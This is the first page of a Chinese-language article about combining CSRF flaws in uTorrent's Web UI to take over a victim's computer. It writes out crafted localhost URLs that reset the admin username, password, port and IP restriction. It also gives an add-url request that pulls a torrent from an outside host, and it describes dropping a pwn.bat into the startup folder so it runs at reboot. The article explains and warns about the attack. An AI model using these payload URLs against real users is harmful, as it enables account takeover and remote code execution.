uTorrent是一款優秀的BT下載客戶端軟件,它具有個頭小巧,界面清爽,下載速度快等諸多優點,所以廣受喜歡用BT下載的用戶的歡迎。但是,我想要說的是,親愛的uTorrent用戶們,小心了,黑客正在向我們襲來……
人們已經發現了幾個CSRF漏洞,將它們組合起來就能對uTorrent的Web用戶界面及其底層的系統造成破壞性的打擊——攻擊者不僅可以強迫uTorrent下載任意的torrents文件,還能把下載后的文件移動到系統中的任意目錄下,并最終完全控制受害者的計算機。下面開始介紹黑客們的攻擊手法。
一、篡改登錄信息
眼下,有越來越多的軟件開始采用Web 應用程序接口,例如BitTorrent客戶端就是一個很好的例子。人們始料未及的是,web接口通常易于受到攻擊,攻擊者利用web接口的最大困難只是難于獲悉web接口的精確位置。 雖然遠程執行代碼也是可能的,但是這并非一個非常嚴重的安全漏洞,因為它難以利用。所以,針對BitTorrent客戶端的攻擊數量將超過對BitTorrent服務器的攻擊。
下面我們詳細介紹如何通過跨站請求偽造技術來修改uTorrent的Web用戶界面登錄信息。我們知道,利用CSRF可以修改Web用戶界面所需的用戶名和口令,但是攻擊者要想修改這些用戶名和口令的話,前提是用戶已經登錄——但是這對于攻擊者來說并非難事,通過社交工程就能達到這一目的。
好了,現在假設用戶已經登錄,那么利用下列精心構造的URL,攻擊者就能修改uTorrent管理員登錄信息:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
構造好上述的陷阱后,攻擊者所要做的只是誘騙用戶點擊這些URL。當然,攻擊者不會傻到直接將這些鏈接信息暴露給用戶,他們可以通過多種方法來做掩護。當更改用戶名和密碼之后,瀏覽器必須重新進行身份驗證,方法如下:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
二、強迫uTorrent執行下載的文件
利用CSRF可以修改Web用戶界面所需的用戶名和口令,但是攻擊者要想修改這些用戶名和口令的話,前提是用戶已經登錄——但是這對于攻擊者來說并非難事,通過社交工程就能達到這一目的。對于本文所介紹的攻擊,我們假設用戶已經通過了uTorrent的Web用戶界面的身份驗證。
首先,攻擊者需要設法讓選擇的文件進入一個計算機,更重要的是,攻擊者還得設法把它放在他們指定的目錄中。我們看一下正常情況下,用戶是如何為下載的文件指定存放目錄的。我們需要打開uTorrent的“Move completed downloads to”選項。
![]() |
圖1 |
然后,我們還得告訴uTorrent將下載好的文件移動到哪一個目錄下。
![]() |
圖2 指定目錄 |
我們知道,利用跨站請求偽造技術,攻擊者能夠以用戶的身份來行事,因為前面我們已經假設用戶已經登錄到客戶端了。所以,攻擊者所要做的只是設法讓用戶點擊上圖中的URL即可,如下所示:
這時,他們的uTorrent的下載首選項現在將變成下面的樣子:
![]() |
圖3 修改后的首選項 |
這樣的話,下載后的文件將被移動到All Users的啟動文件夾,并且只要攻擊者能夠強迫用戶下載文件,實際上他們就已經得手了。例如,攻擊者可以通過下列方法來強迫用戶下載一個torrent文件:
http://localhost:14774/gui/?action=add-url&s=http://www.whatever.com/file.torrent
假設該torrent文件讓uTorrent下載一個名為pwn.bat的文件。下載一旦完成,pwn.bat就會位于啟動文件夾,所以當用戶重新引導系統時該文件就會被執行。但是等一下,情況還會更糟……
共2頁: 1 [2] 下一頁 | ||||
|